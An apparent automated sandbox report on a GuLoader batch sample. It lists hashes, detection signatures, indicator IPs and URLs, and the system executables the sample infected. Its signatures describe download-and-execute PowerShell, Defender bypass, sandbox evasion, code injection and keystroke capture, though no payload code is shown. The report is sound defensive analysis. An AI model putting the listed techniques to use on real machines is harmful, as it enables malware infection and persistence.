Windows Analysis Report
kam.cmd

Overview

General Information

Sample name: kam.cmd
Analysis ID: 1446714
MD5: c7b720a0f6bffebe027826a2508c52dc
SHA1: 41b21cdcd0afd9363d1c79202d687c65fc6128b4
SHA256: c67dbe7d1bfb36fcab8391ea0728382445c106fb08ad19f9a3fb3777cdef5562
Infos:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Found suspicious powershell code related to unpacking or dynamic code loading
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Classes Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.3% probability
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbS source: powershell.exe, 00000006.00000002.2410289196.00000000079ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: @ntkrnlmp.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officeappguardwin32.pdb source: officeappguardwin32.exe.9.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbW source: powershell.exe, 00000006.00000002.2410289196.00000000079ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lambda_methodCore.pdb source: powershell.exe, 00000006.00000002.2416249131.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*.* source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.9.dr
Source: Binary string: @winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.9.dr
Source: Binary string: )"WINLOA~1.PDBk,"$5,"$5," source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wab.pdbGCTL source: OfficeScrSanBroker.exe.9.dr, jucheck.exe.9.dr, officeappguardwin32.exe.9.dr, dbcicons.exe.9.dr, sscicons.exe.9.dr, notification_click_helper.exe.9.dr, accicons.exe.9.dr
Source: Binary string: wab.pdb source: OfficeScrSanBroker.exe.9.dr, jucheck.exe.9.dr, officeappguardwin32.exe.9.dr, dbcicons.exe.9.dr, sscicons.exe.9.dr, notification_click_helper.exe.9.dr, accicons.exe.9.dr
Source: Binary string: in32.pdb source: officeappguardwin32.exe.9.dr
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2402584546.0000000003515000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officescrsanbroker.pdbbroker.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OfficeScrSanBroker.exe.9.dr
Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officescrsanbroker.pdb source: OfficeScrSanBroker.exe.9.dr
Source: Binary string: ,"4winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officeappguardwin32.pdbin32.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officeappguardwin32.exe.9.dr
Source: Binary string: LC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: broker.pdb source: OfficeScrSanBroker.exe.9.dr
Source: Binary string: @winload_prod.pdbf,"@ source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: )"WINLOA~1.PDB source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp

Spreading
barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
